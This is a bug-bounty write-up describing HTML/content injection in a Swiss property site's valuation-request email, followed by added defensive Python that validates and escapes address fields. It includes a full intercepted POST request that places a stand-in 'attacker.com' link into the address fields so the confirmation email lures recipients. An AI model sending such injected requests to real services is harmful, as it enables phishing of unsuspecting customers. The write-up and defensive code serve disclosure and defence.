Easy Bug | Email HTML Injection
Overview of the Vulnerability:
Content spoofing, also known as content injection or HTML injection, is a type of web application vulnerability where an attacker injects malicious content into a web page. This injected content is then rendered by the client’s browser as if it were legitimate content from the trusted website. The attack leverages the inherent trust users place in the brand and the business to manipulate them into taking specific actions.
Steps:
After researching and thinking about all the functions on the site, such as registering for the newsletter or booking hotels and homes, I found the following:
An endpoint that lets me book a hotel and then sends me an email containing the details I entered.
This is amazing
- The request was intercepted by “Burp Suite”
- I tried to inject HTML code in different ways, but the request was rejected with “403 Forbidden”
- I tried to manipulate the sent data, especially since it cannot be manipulated through the front-end.
- I was able to change a variable such as “address” and set its value to a “website” that the victim could be directed to.
POST /property-valuation/valuation-request HTTP/2
Host: api.[Redacted].ch
User-Agent: [Redacted]
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
X-Api-Key: [Redacted]
Content-Length: 446
Origin: [Redacted]
Referer: [Redacted]
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Te: trailers
{"propertyType":1,"offerType":1,"address":{"city":"Bern","countryCode":"CH","postalCode":"3006","street":"https://attacker.com","lat":46.9432455,"lon":7.469297500000001,"formattedAddress":"https://attacker.com"},"livingSpace":100000000000,"lotSize":10,"rooms":1.5,"buildYear":2000,"isRenovated":true,"email":"free@Palestine.com","name":"victim","phoneNumber":"+21234567890","culture":"en-CH","leadId":"53fbe8bc-db09-4c9b-bef6-a177a11db46d"}
Note that it worked
Impact:
The email message can be manipulated and customers directed to suspicious links that may ask them to enter sensitive data, which affects your company’s reputation.
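As an added illustration of how the receiving side can defend against this class of bug (this is example code, not the vendor's API or any code from the write-up), the block below does two things to the JSON body shown above: it flags address fields that carry a URL or markup before the request is accepted, and it HTML-escapes every user-supplied value when the confirmation email is rendered. The sample body, the field list and the email template are constructed for the example; the "street" and "formattedAddress" keys mirror the request in the post.

```python
import html
import re
from typing import Dict

# Constructed sample payload modelled on the request body in the write-up;
# the values are illustrative, not the original data.
SAMPLE_BODY = {
    "address": {
        "city": "Bern",
        "countryCode": "CH",
        "postalCode": "3006",
        "street": "https://attacker.com",
        "formattedAddress": "https://attacker.com",
    },
    "email": "victim@example.com",
    "name": "victim",
}

# Address components that end up in the notification email. These should only
# ever hold free-text address parts, never links or markup.
ADDRESS_FIELDS = ("city", "street", "formattedAddress", "postalCode")

# Heuristic: a scheme, a "www." prefix, or a bare "host.tld" token. Mail clients
# auto-link bare domains, so plain "attacker.com" is as dangerous as a full URL.
# Tune the bare-domain branch for locales where street names contain dots.
URL_PATTERN = re.compile(r"(?i)\b(?:https?://|www\.|[a-z0-9-]+\.[a-z]{2,})\S*")
MARKUP_PATTERN = re.compile(r"[<>]")


def find_injected_fields(body: Dict) -> Dict[str, str]:
    """Return {field: value} for every address field holding a URL or markup.

    An empty dict means the address looks like plain text and may be accepted.
    """
    address = body.get("address", {})
    bad = {}
    for field in ADDRESS_FIELDS:
        value = str(address.get(field, ""))
        if URL_PATTERN.search(value) or MARKUP_PATTERN.search(value):
            bad[field] = value
    return bad


def render_email(body: Dict) -> str:
    """Build the HTML email body with every user-supplied value escaped.

    html.escape(quote=True) neutralises <, >, &, " and ', so injected tags are
    shown literally instead of being rendered by the recipient's mail client.
    """
    address = body.get("address", {})
    street = html.escape(str(address.get("street", "")), quote=True)
    city = html.escape(str(address.get("city", "")), quote=True)
    name = html.escape(str(body.get("name", "")), quote=True)
    return (
        f"<p>Hello {name},</p>"
        f"<p>We received your valuation request for {street}, {city}.</p>"
    )


if __name__ == "__main__":
    # Reject the constructed payload before any email is queued.
    print(find_injected_fields(SAMPLE_BODY))
```

Escaping alone is not enough here: an escaped "https://attacker.com" is still visible, still looks like an address, and most mail clients turn it into a clickable link, which is exactly the lure described in the Impact section. That is why the validator rejects URL-like values at the API boundary and the renderer escapes whatever does get through; each layer covers a failure of the other.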
Duplicate, two days before I submitted it :(